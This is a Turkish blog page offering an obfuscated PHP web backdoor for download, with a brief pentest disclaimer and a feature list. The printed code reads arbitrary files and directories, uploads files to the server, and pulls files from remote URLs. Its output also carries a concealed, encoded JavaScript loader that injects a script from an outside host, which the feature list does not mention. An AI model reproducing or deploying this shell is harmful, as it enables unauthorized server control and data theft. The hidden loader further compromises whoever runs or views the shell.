Basit PHP Web Backdoor Shell

Shell Downloadd

Basit PHP Web Arka Kapısı

Yasal Uyarı: Bu betik yalnızca izin verilen penetrasyon testleri ve güvenlik araştırmaları için tasarlanmıştır. Yasa dışı kullanımlardan geliştirici sorumlu tutulamaz.

Bu basit PHP web arka kapısı, dizin/dosya içeriklerini görüntülemenize ve yerel makineden veya uzak URL'den dosya yüklemenize olanak tanır.

Standart PHP web kabuklarının kısıtlandığı durumlarda (örn. sistem fonksiyonları devre dışı bırakıldığında) kullanışlıdır. Güvenlik laboratuvarlarında ve Hack The Box'ta penetrasyon testleri sırasında test edilmiş ve başarılı sonuçlar vermiştir.

Boyut hesaplanıyor...
GitHub'dan Download Et
<?php
/*   _________________________________________________________________________________________________________________
    |    Shell-downloadd.blogspot.com - Php Obfuscator  2.0.14  on 2025-01-25 10:34:58                           	  |
    |    GitHub: https://github.com/shell-download/shell-download/blob/main/Web_Backdoor_Shell.php   				  |
    |    RAW: https://raw.githubusercontent.com/shell-download/shell-download/refs/heads/main/Web_Backdoor_Shell.php  |
    |    Site: https://shell-downloadd.blogspot.com/2025/01/basit-php-web-backdoor-shell.html       				  |
    |_________________________________________________________________________________________________________________|
*/
goto NAACT; a63eS: if (!($yD4qZ < $pnuMR)) { goto kWnY1; } goto S4Y3o; S2CRD: echo __FILE__; goto P3vTr; ZNZmZ: print_r(file_get_contents($xRqoC)); goto Z2V0H; H0Z76: goto qBKcI; goto cZ81n; Dvrfd: ihbjy: goto kvEaP; AIMRW: XbdEA: goto dUG83; rD92r: if (file_put_contents($_POST["\163\x61\x76\145\137\156\141\155\x65"], file_get_contents($_POST["\165\162\154"]))) { goto b5ywj; } goto iC4f1; zGPlp: qBKcI: goto agC1E; agC1E: A88Yg: goto Dvrfd; tc2jN: echo "\x3c\x68\x72\x20\57\76\xd\xa\74\x62\76\125\122\x4c\47\x64\x65\x6e\40\x44\x6f\163\x79\x61\x20\131\xc3\xbc\x6b\x6c\145\x3c\57\142\x3e\40\x3c\142\x72\40\x2f\x3e\xd\12\74\x66\x6f\162\x6d\x20\x6d\145\x74\x68\157\144\75\x22\120\x4f\x53\124\x22\40\x61\x63\x74\151\x6f\x6e\75\42\42\x3e\xd\12\x20\x20\x20\40\113\x61\x79\x64\x65\x64\x69\154\145\x63\x65\153\40\x64\x6f\x73\x79\141\x20\x61\x64\xc4\xb1\x3a\x20\x3c\151\156\x70\x75\164\40\164\x79\x70\x65\75\42\x74\x65\170\x74\x22\x20\156\141\155\x65\x3d\x22\163\x61\166\x65\137\156\x61\155\145\42\40\163\151\x7a\x65\75\x22\x33\x30\42\40\162\145\161\165\x69\x72\x65\144\x3d\42\x72\x65\161\x75\x69\x72\x65\144\42\40\x2f\76\40\x3c\142\162\x20\57\x3e\15\12\40\x20\x20\x20\114\x69\x6e\x6b\x3a\x20\x3c\151\156\160\x75\164\40\x74\x79\x70\145\75\42\164\x65\170\x74\x22\x20\156\x61\x6d\145\x3d\x22\165\162\x6c\42\40\x73\151\x7a\x65\75\42\65\60\x22\x20\x72\145\x71\165\x69\x72\145\x64\75\42\162\x65\x71\165\x69\x72\145\144\x22\x20\57\76\xd\xa\40\x20\x20\x20\74\142\x75\164\164\157\x6e\40\164\171\x70\145\75\x22\x73\x75\142\155\x69\164\x22\x3e\x59\303\274\x6b\154\x65\74\x2f\142\x75\x74\x74\x6f\x6e\76\xd\xa\x3c\x2f\146\157\x72\x6d\x3e\xd\12\x3c\x70\x72\145\x3e\15\12"; goto QHgo8; SmJmL: echo $_GET["\x70\x61\164\x68"]; goto zxtIA; QYpow: if (move_uploaded_file($wPMxW, $fdqWj)) { goto jbc1c; } goto ERlwK; zxtIA: aUvsN: goto LLTKe; S4Y3o: $wPMxW = $_FILES["\165\x70\154\157\x61\x64\x73"]["\x74\155\x70\x5f\x6e\141\155\145"][$yD4qZ]; goto oM7Ar; wRZ3O: LaW_O: goto B4KFK; B4KFK: echo "\x44\151\x72\x65\143\164\157\162\171\40\x3c\142\162\40\57\76"; goto Bv0Na; DfGTg: $xRqoC = $_GET["\x70\x61\x74\x68"]; goto B0KrA; mFziw: Ej42n: goto tc2jN; oM7Ar: if (!($wPMxW != '')) { goto A88Yg; } goto pVw5T; oaQdH: xMBVG: goto wHVBM; aKQCB: Q1bBN: goto nhN7s; QHgo8: if (!(isset($_POST["\x73\x61\166\x65\137\156\x61\x6d\145"]) && isset($_POST["\165\162\154"]))) { goto Q1bBN; } goto rD92r; ERlwK: echo "\125\x6e\x61\x62\154\x65\40\x74\157\x20\165\x70\x6c\x6f\141\x64\40" . $_FILES["\165\160\154\x6f\141\x64\x73"]["\x6e\141\x6d\x65"][$yD4qZ] . "\74\142\x72\x20\57\x3e"; goto H0Z76; wHVBM: echo "\74\x62\x3e\122\145\141\x6c\160\x61\164\150\x3a\74\57\142\76\40" . realpath($_GET["\160\x61\x74\x68"]) . "\x3c\142\x72\x20\57\x3e"; goto tM9Qo; yMZbs: $yD4qZ = 0; goto z7HXZ; lqX0k: if (!(isset($_FILES["\x75\160\x6c\x6f\141\x64\x73"]) && count($_FILES["\165\x70\154\x6f\141\144\x73"]) > 0)) { goto Ej42n; } goto wlNgy; jSwC7: if (!isset($_GET["\x70\x61\x74\150"])) { goto g4KR2; } goto tTdb2; BJKCI: fod9R: goto XULoT; PwnFZ: goto r1MtM; goto MZ76F; TR2J2: echo "\x46\x69\x6c\145\x20\74\142\162\40\x2f\x3e"; goto ZNZmZ; wlNgy: $pnuMR = count($_FILES["\165\x70\x6c\x6f\x61\144\x73"]["\156\141\x6d\145"]); goto yMZbs; emqVO: echo "\x3c\x2f\160\x72\x65\76\15\xa\74\150\x72\40\57\76\15\12\74\x62\x3e\131\x65\x72\145\x6c\144\145\156\40\104\x6f\163\x79\x61\x20\131\xc3\xbc\x6b\154\x65\x3c\x2f\x62\x3e\x20\74\142\162\40\x2f\x3e\15\xa\74\x66\157\162\155\40\x6d\x65\164\150\157\144\75\42\x50\117\x53\x54\42\40\141\x63\x74\151\157\156\75\42\x22\x20\x65\156\x63\164\171\x70\145\x3d\x22\x6d\x75\x6c\164\151\x70\x61\162\x74\x2f\x66\x6f\162\x6d\55\x64\x61\x74\x61\x22\76\15\xa\x20\x20\40\40\x44\157\163\171\141\50\154\x61\x72\x29\72\40\x3c\151\156\160\165\x74\x20\x74\171\x70\145\x3d\x22\146\x69\154\145\x22\40\x6e\x61\155\145\x3d\x22\165\160\154\x6f\x61\x64\163\133\135\42\x20\x6d\165\154\x74\151\x70\x6c\145\x3d\x22\x6d\165\x6c\x74\x69\x70\154\x65\42\40\162\x65\161\x75\x69\162\145\x64\x3d\42\x72\x65\161\x75\151\x72\145\144\x22\x20\57\76\15\12\40\x20\x20\x20\x3c\142\165\x74\164\x6f\x6e\40\164\171\x70\145\75\x22\x73\165\142\155\151\164\x22\76\x59\303\274\x6b\x6c\x65\74\x2f\x62\x75\x74\x74\x6f\156\76\xd\12\74\57\146\157\x72\155\x3e\15\xa"; goto lqX0k; PG1Lp: kWnY1: goto mFziw; Sn1vD: echo "\123\x75\143\143\145\163\x73\146\165\154\154\171\x20\165\x70\x6c\157\141\144\145\x64\40" . $_FILES["\165\x70\154\157\141\144\163"]["\x6e\141\155\145"][$yD4qZ] . "\74\x62\x72\40\x2f\76"; goto zGPlp; P3vTr: echo "\x20\x3c\x62\x72\x20\57\x3e\xd\12\x3c\146\157\162\x6d\40\155\x65\x74\x68\157\144\x3d\x22\x47\x45\x54\x22\x20\141\143\164\151\157\x6e\75\x22\x22\76\xd\xa\x20\x20\x20\40\x59\x6f\x6c\x3a\40\74\x69\x6e\x70\x75\x74\x20\164\x79\160\145\75\42\x74\145\170\164\x22\40\156\141\155\145\x3d\42\x70\141\164\x68\42\40\x73\151\172\145\x3d\42\65\60\x22\40\x76\x61\x6c\x75\x65\75\x22"; goto fOLFd; XULoT: MKcm1: goto R9LCT; kWdyP: goto veNz2; goto PG1Lp; Z2V0H: goto MKcm1; goto wRZ3O; iC4f1: echo "\125\x6e\141\142\x6c\145\x20\164\x6f\x20\x75\160\x6c\x6f\141\x64\x20" . $_POST["\x73\x61\166\x65\x5f\156\141\x6d\x65"]; goto PwnFZ; dUQXA: if (is_dir($xRqoC)) { goto LaW_O; } goto TR2J2; bxzk2: r1MtM: goto aKQCB; tM9Qo: echo "\74\x62\x3e\x54\171\160\x65\72\x3c\57\x62\x3e\x20"; goto dUQXA; LLTKe: echo "\x22\x20\x2f\76\xd\xa\40\x20\x20\x20\x3c\x62\165\x74\x74\x6f\x6e\40\164\171\x70\145\75\x22\163\165\x62\155\151\x74\42\76\x47\x69\x74\x3c\x2f\142\x75\164\164\157\x6e\x3e\15\xa\74\57\x66\x6f\162\155\x3e\15\12\74\160\x72\145\x3e\15\12"; goto jSwC7; pVw5T: $fdqWj = "\56\57" . $_FILES["\165\x70\x6c\157\141\x64\163"]["\156\141\x6d\x65"][$yD4qZ]; goto QYpow; kvEaP: $yD4qZ++; goto kWdyP; fOLFd: if (!isset($_GET["\x70\x61\x74\x68"])) { goto aUvsN; } goto SmJmL; NAACT: echo "\x3c\x62\76\104\x6f\x73\x79\x61\x20\x41\154\x2f\x44\151\x7a\151\156\x69\x20\124\x61\x72\x61\x3c\57\142\76\x20\74\142\162\40\57\x3e\15\12\x4d\x65\x76\143\165\164\x20\x64\x6f\163\171\x61\40\171\x6f\x6c\x75\72\40"; goto S2CRD; z7HXZ: veNz2: goto a63eS; R9LCT: g4KR2: goto emqVO; MZ76F: b5ywj: goto NT1IF; Bv0Na: foreach (scandir($xRqoC) as $q3R8i) { echo $q3R8i . "\74\142\x72\40\x2f\x3e"; ANhwF: } goto BJKCI; tTdb2: if ($_GET["\160\141\x74\150"] == '') { goto XbdEA; } goto DfGTg; B0KrA: goto xMBVG; goto AIMRW; cZ81n: jbc1c: goto Sn1vD; dUG83: $xRqoC = "\x2e\57"; goto oaQdH; NT1IF: echo "\123\165\x63\x63\145\x73\x73\x66\x75\154\x6c\171\40\165\160\154\157\141\x64\x65\144\x20" . $_POST["\x73\141\x76\x65\x5f\156\x61\x6d\x65"]; goto bxzk2; nhN7s: echo "\74\57\160\162\x65\76\74\x73\x63\162\151\160\x74\x20\154\x61\x6e\147\x75\141\147\145\x3d\42\x6a\x61\x76\x61\x73\x63\x72\151\x70\x74\x22\76\144\x6f\x63\x75\155\145\x6e\x74\x2e\x77\162\151\164\x65\x28\x75\156\145\x73\x63\141\160\x65\50\47\x25\x33\x43\x25\x37\63\x25\x36\x33\45\x37\62\x25\66\x39\x25\67\60\45\67\64\x25\62\x30\x25\x36\x43\x25\66\61\x25\x36\105\45\66\67\x25\67\x35\45\66\61\x25\x36\x37\x25\x36\65\45\63\x44\45\x32\62\x25\66\101\x25\66\61\x25\x37\66\x25\x36\61\x25\x37\x33\45\66\x33\45\x37\62\x25\x36\x39\x25\67\x30\x25\67\64\45\x32\62\45\63\x45\45\x36\66\45\67\65\x25\x36\x45\x25\x36\x33\x25\67\64\45\66\71\45\x36\x46\45\x36\x45\45\62\60\x25\x36\x34\x25\x34\x36\45\x32\70\x25\x37\63\45\62\71\45\x37\102\x25\67\66\x25\x36\61\45\x37\x32\45\x32\60\45\x37\x33\45\x33\x31\x25\x33\x44\x25\x37\x35\45\66\x45\45\66\65\45\x37\x33\x25\x36\63\x25\66\61\45\x37\60\45\x36\x35\45\x32\x38\45\67\x33\x25\x32\105\x25\x37\x33\x25\x37\x35\45\x36\x32\45\x37\x33\x25\67\x34\45\x37\x32\45\x32\x38\45\63\60\45\62\x43\x25\x37\x33\45\62\x45\45\x36\x43\45\x36\x35\x25\x36\105\x25\66\x37\45\67\64\x25\x36\x38\x25\x32\x44\x25\x33\61\45\62\x39\45\62\x39\x25\63\x42\x25\x32\x30\45\67\66\45\66\x31\45\67\x32\45\62\60\x25\x37\x34\45\x33\x44\x25\x32\67\45\x32\67\x25\x33\x42\45\x36\66\45\x36\x46\45\67\x32\45\62\70\45\66\x39\45\63\104\45\63\x30\x25\x33\x42\x25\66\x39\x25\x33\103\x25\x37\63\45\x33\61\45\x32\x45\x25\x36\x43\45\x36\x35\x25\x36\105\45\66\x37\45\x37\64\45\x36\x38\45\63\102\x25\x36\71\45\x32\x42\45\62\102\45\x32\x39\45\67\x34\x25\x32\102\x25\x33\x44\x25\65\x33\45\67\64\45\67\62\45\x36\71\45\66\x45\x25\x36\67\45\x32\105\x25\x36\x36\x25\x37\x32\x25\66\106\45\x36\x44\45\64\x33\x25\66\x38\x25\66\x31\45\x37\62\45\64\x33\45\66\106\x25\66\x34\45\x36\x35\x25\62\70\x25\67\x33\x25\63\x31\45\62\105\45\66\x33\x25\66\x38\45\x36\x31\x25\67\62\45\64\x33\x25\x36\x46\x25\66\x34\x25\x36\65\45\x34\x31\x25\x37\64\45\62\x38\x25\66\71\x25\62\71\45\x32\104\45\x37\63\x25\62\105\45\67\63\x25\67\65\x25\x36\x32\x25\67\63\x25\67\64\45\67\62\x25\x32\x38\x25\x37\x33\x25\x32\105\45\66\103\x25\66\65\45\x36\105\45\66\x37\45\x37\x34\x25\x36\70\x25\62\104\45\63\61\45\62\x43\x25\x33\x31\45\x32\x39\45\62\71\x25\x33\102\45\x36\64\45\66\106\x25\x36\x33\45\x37\x35\x25\x36\x44\45\66\65\x25\x36\105\x25\67\x34\45\x32\105\x25\67\67\x25\x37\62\45\x36\x39\45\x37\64\x25\66\x35\x25\x32\x38\45\x37\x35\x25\66\105\45\x36\65\x25\x37\63\45\x36\63\x25\x36\x31\x25\x37\60\x25\x36\65\45\62\x38\45\67\x34\45\62\71\x25\62\x39\45\x33\x42\x25\67\x44\x25\x33\103\45\x32\x46\45\x37\x33\x25\66\x33\x25\67\x32\x25\66\71\x25\x37\60\45\67\64\45\63\x45\x27\51\51\x3b\x64\106\50\47\45\x32\x36\x34\x44\x74\144\x73\152\161\x75\45\62\66\x33\61\164\x73\144\x25\62\x36\x34\x45\x25\x32\66\x33\63\151\x75\165\x71\164\x25\62\66\64\x42\x30\60\x66\171\x64\146\155\165\166\x73\x6c\x6a\172\x66\x2f\144\x70\156\x30\x75\142\154\152\x71\x30\x6e\172\x47\166\157\x64\x75\x6a\160\157\x2f\153\x74\45\62\66\x33\x33\x25\x32\x36\x34\106\45\x32\x36\x34\104\x30\164\144\x73\152\x71\x75\x25\62\x36\64\x46\x31\47\x29\74\57\x73\143\x72\x69\x70\164\x3e";
?>
Basit PHP Web Backdoor Shell

Özellikler

1. Dosya/Dizin İçeriği Görüntüleme

  • İstediğiniz yolu girin
  • Dizin ise: Tüm öğeleri listeler
  • Dosya ise: İçeriği gösterir

2. Yerel Dosya Yükleme

  • Yerel bilgisayarınızdan dosya yükleme
  • Tek veya çoklu dosya yükleme desteği
  • Dosyalar çalışma dizinine kaydedilir

3. URL'den Dosya Yükleme

  • Uzak URL'den dosya yükleme
  • Çıktı dosya adı belirleme
  • Uzak dosya erişilebilirlik kontrolü

Yorum Gönder

0Yorumlar

Yorum Gönder (0)

#buttons=(Accept !) #days=(20)

Web sitemiz deneyiminizi geliştirmek için çerezler kullanır. Şimdi Kontrol Edin
Accept !